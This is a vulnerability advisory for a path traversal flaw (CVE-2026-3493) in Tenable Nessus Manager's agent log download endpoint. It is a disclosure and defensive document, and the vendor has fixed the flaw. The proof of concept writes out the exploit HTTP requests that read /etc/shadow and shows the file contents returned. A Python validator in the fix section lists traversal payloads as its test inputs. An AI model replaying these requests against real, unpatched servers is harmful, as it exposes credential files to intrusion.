usd-2026-003 | Tenable Nessus Manager 10.11.1 - Path Traversal (CWE-35)

Product: Tenable Nessus Manager
Affected Version: 10.11.1
Vulnerability Type: Path Traversal (CWE-35)
Security Risk: High
Vendor: Tenable
Vendor URL: https://www.tenable.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2026-3493
CVE Link: https://www.cve.org/CVERecord?id=CVE-2026-3493
Advisory ID: usd-2026-003

Description

Tenable Nessus Manager is a vulnerability management platform designed to centrally coordinate vulnerability scanning. It provides a management layer for orchestrating scanners and administering Nessus Agents. Nessus Manager can remotely manage, update, and configure linked agents.
Once agents are linked, they receive scan instructions from the manager, perform assessments locally on the host system, and send results back to the manager.

Nessus Manager also provides functionality for retrieving logs from linked agents. Administrators can request agent logs, after which the agents push their log data back to the manager, where the collected logs can then be downloaded for analysis.

The log download mechanism contains a path traversal vulnerability that allows administrative users to navigate outside the intended directories and download arbitrary files from the manager's underlying operating system.

Proof of Concept

The log parameter in the POST request to /agents/x/download-log can be exploited to access arbitrary files through path traversal, as illustrated in the sample request below:

POST /agents/4/download-log HTTP/1.1
Host: 192.168.213.133:8834
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
X-Cookie: token=187972135c67f529687c2490376cdc6989131f7d0655d362
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.213.133:8834/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
Content-Length: 58
{"log":"../../../../../../../../../../../../etc/shadow"}

The response contains a one-time token issued for this specific request.

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
X-Frame-Options: DENY
Content-Type: application/json
Connection: close
X-XSS-Protection: 1; mode=block
Server: NessusWWW
X-Content-Type-Options: nosniff
Date: Tue, 24 Feb 2026 13:44:28 GMT
Content-Length: 76
Content-Security-Policy: upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src https://store.tenable.com; default-src 'self'; connect-src 'self' data.nessus-telemetry.tenable.com content.nessus-telemetry.tenable.com www.tenable.com; script-src 'self' content.nessus-telemetry.tenable.com www.tenable.com; img-src 'self' data: content.nessus-telemetry.tenable.com data.nessus-telemetry.tenable.com; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self';
Strict-Transport-Security: max-age=31536000; includeSubDomains
Expires: 0
Expect-CT: max-age=0
Pragma: no-cache
{"token":"21c09c96065f900cfb1d6c2f3cf548a1950578fe55b3b7cfaa7a8b5581c80c14"}

The token can then be used to perform a one-time download via the following GET request:

GET /tokens/21c09c96065f900cfb1d6c2f3cf548a1950578fe55b3b7cfaa7a8b5581c80c14/download HTTP/1.1
Host: 192.168.213.133:8834
[...]

As a result, the contents of the /etc/shadow file are returned in the server's response:

HTTP/1.1 200 OK
Content-Disposition: attachment; filename="../../../../../../../../../../../../etc/shadow"
Cache-Control: no-cache, no-store, must-revalidate
X-Frame-Options: DENY
Content-Type: application/octet-stream
Connection: close
X-XSS-Protection: 1; mode=block
Server: NessusWWW
Date: Tue, 24 Feb 2026 13:44:35 GMT
X-Content-Type-Options: nosniff
Content-Security-Policy: upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src https://store.tenable.com; default-src 'self'; connect-src 'self' data.nessus-telemetry.tenable.com content.nessus-telemetry.tenable.com www.tenable.com; script-src 'self' content.nessus-telemetry.tenable.com www.tenable.com; img-src 'self' data: content.nessus-telemetry.tenable.com data.nessus-telemetry.tenable.com; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self';
Strict-Transport-Security: max-age=31536000; includeSubDomains
Expect-CT: max-age=0
Expires: 0
Pragma: no-cache
Content-Length: 833

root:!::0:99999:7:::
bin:*:19447:0:99999:7:::
daemon:*:19447:0:99999:7:::
adm:*:19447:0:99999:7:::
lp:*:19447:0:99999:7:::
sync:*:19447:0:99999:7:::
shutdown:*:19447:0:99999:7:::
halt:*:19447:0:99999:7:::
mail:*:19447:0:99999:7:::
operator:*:19447:0:99999:7:::
games:*:19447:0:99999:7:::
ftp:*:19447:0:99999:7:::
nobody:*:19447:0:99999:7:::
dbus:!!:20487::::::
systemd-coredump:!!:20487::::::
systemd-resolve:!!:20487::::::
tss:!!:20487::::::
polkitd:!!:20487::::::
clevis:!!:20487::::::
unbound:!!:20487::::::
sshd:!!:20487::::::
setroubleshoot:!!:20487::::::
cockpit-ws:!!:20487::::::
cockpit-wsinstance:!!:20487::::::
pcp:!!:20487::::::
sssd:!!:20487::::::
chrony:!!:20487::::::
tcpdump:!!:20487::::::
admin:$6$[REDACTED]:20487:0:99999:7:::

Fix

It is recommended to implement strict input validation and sanitization on the log parameter to prevent path traversal attacks. The application should restrict the parameter to a predefined set of valid log filenames or enforce resolution within a designated log directory. Input should be normalized to its canonical form, and any requests containing traversal sequences (e.g., ../) should be explicitly rejected.
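The following is an added example of the validation the fix section describes; it is not Tenable's code and says nothing about how Nessus Manager implements its fix. It assumes a handler that receives the decoded log parameter and a designated log directory, and it combines the three controls named above: an optional allowlist of known log names, syntactic rejection of traversal sequences, and a containment check on the canonical (symlink-resolved) path. The directory layout, the agent-4 identifier and the file contents in the demo are constructed for illustration.

```python
"""Path validation for a "download this agent log" endpoint.

Added example, not the vendor's code. Shows: allowlist of known names,
rejection of traversal sequences, and canonical-path containment inside
the designated log directory. All names and files below are constructed.
"""
import os
import re
import tempfile

# One path segment: starts alphanumeric, then alphanumerics, '.', '_' or '-'.
# This rejects "", ".", "..", dotfiles, separators of either kind, NUL bytes
# and percent signs, so encoded or OS-specific traversal never reaches the
# filesystem layer.
_SEGMENT = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


class InvalidLogPath(ValueError):
    """Raised when a requested log name must not be served."""


def is_valid_log_name(name: str) -> bool:
    """Syntactic check: 'agent-4/nessus.log' is fine, '../etc/shadow' is not."""
    if not name or len(name) > 255:
        return False
    return all(_SEGMENT.match(seg) for seg in name.split("/"))


def resolve_log_path(base_dir: str, requested: str, allowed=None) -> str:
    """Return the canonical on-disk path for `requested`, or raise InvalidLogPath.

    `allowed` is an optional set of exact log names (the "predefined set of
    valid log filenames" approach); when given, anything else is refused
    before any filesystem work happens.
    """
    if allowed is not None and requested not in allowed:
        raise InvalidLogPath("not a known log name")
    if not is_valid_log_name(requested):
        raise InvalidLogPath("malformed name or traversal sequence")

    base = os.path.realpath(base_dir)
    # realpath follows symlinks, so a link planted inside the log directory
    # that points elsewhere is caught by the containment check below.
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath rather than str.startswith: '/var/log/nessus' must not
    # accept '/var/log/nessus-old/x' as "inside".
    if os.path.commonpath([base, candidate]) != base:
        raise InvalidLogPath("resolves outside the log directory")
    return candidate


def run_demo() -> dict:
    """Constructed scenario: a temp log directory holding one agent log and
    one symlink that escapes it. Returns {request: ("ok", relpath) or
    ("rejected", reason)} so each input's outcome can be inspected."""
    with tempfile.TemporaryDirectory() as outside, tempfile.TemporaryDirectory() as logs:
        secret = os.path.join(outside, "shadow")  # stands in for a file outside the log dir
        with open(secret, "w") as fh:
            fh.write("constructed: not a real shadow file\n")
        os.makedirs(os.path.join(logs, "agent-4"))
        with open(os.path.join(logs, "agent-4", "nessus.log"), "w") as fh:
            fh.write("constructed agent log line\n")
        os.symlink(secret, os.path.join(logs, "escape.log"))  # planted link

        requests = [
            "agent-4/nessus.log",                              # legitimate
            "../../../../../../../../../../../../etc/shadow",  # the advisory's payload
            "/etc/shadow",                                     # absolute path
            "agent-4/..%2F..%2Fetc%2Fshadow",                  # percent-encoded separators
            "agent-4\\..\\..\\etc\\shadow",                    # backslash separators
            "escape.log",                                      # symlink inside the log dir
        ]
        base = os.path.realpath(logs)
        results = {}
        for req in requests:
            try:
                results[req] = ("ok", os.path.relpath(resolve_log_path(logs, req), base))
            except InvalidLogPath as exc:
                results[req] = ("rejected", str(exc))
        return results


if __name__ == "__main__":
    for req, outcome in run_demo().items():
        print(f"{req!r:55} -> {outcome}")
```

The syntactic check alone would already refuse the advisory's payload; the realpath/commonpath step is what covers the cases a string filter cannot see, such as a symlink under the log directory or a sibling directory sharing the base name as a prefix. Pass `allowed` when the set of downloadable logs is known in advance, which is the strictest of the three options.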

References

Timeline

  • 2026-02-24: First contact request via HackerOne
  • 2026-02-25: Vulnerability confirmed as valid
  • 2026-03-03: Nessus Manager 10.10.3 and 10.11.3 released
  • 2026-03-30: Advisory published

Credits

This security vulnerability was identified by Ole Wagner of usd AG.